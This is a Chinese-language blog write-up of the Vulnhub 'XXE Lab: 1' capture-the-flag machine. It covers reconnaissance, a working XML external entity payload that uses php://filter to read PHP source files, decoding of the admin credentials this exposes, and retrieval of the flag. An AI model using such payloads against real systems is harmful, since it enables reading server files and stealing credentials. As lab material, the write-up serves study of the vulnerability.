【Vulnhub靶机】XXE Lab: 1

靶机文档:XXE Lab: 1

下载地址:Download (Mirror)

image-20230918185823631

告诉了利用点:http://your-ip/xxe

信息收集

主机发现

image-20230918185923380

端口扫描

image-20230918190240615

目录扫描

image-20230918190421593

访问robots.txt

image-20230918190510584

访问/xxe

image-20230918190622626

随意输入账密,登陆抓包

image-20230918190827135

看到登陆的格式就是XML语言的数据格式

漏洞利用

payload:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>

image-20230918192600413

将选中base64格式的数据,发送到Decoder模块,去解码

image-20230918192806522

刚才robots.txt文件里还显示有一个admin.php,尝试读取一下

image-20230918192848095

解码发现了用户名和密码

用户名:administhebest

密码解密后是admin@123

image-20230918192932509

还发现了/flagmoout.php

image-20230918192956028

先用得到的账密进行登陆

image-20230918193541551

image-20230918193600781

也跳转到了/flagmeout.php

image-20230918193623009

image-20230918193646153

base64解码后得到一串base32格式的数据

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

解码地址:https://www.qqxiuzi.cn/bianma/base.php

image-20230918193757664

解码后得到base64格式的

再进行base64解码,得到一个路径,再次外部实体注入

image-20230918193848566

image-20230918194122306

image-20230918194108391

image-20230918195137615

运行需要php版本较低 ,高版本会报错,导致出不来结果

php5.6在线运行

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值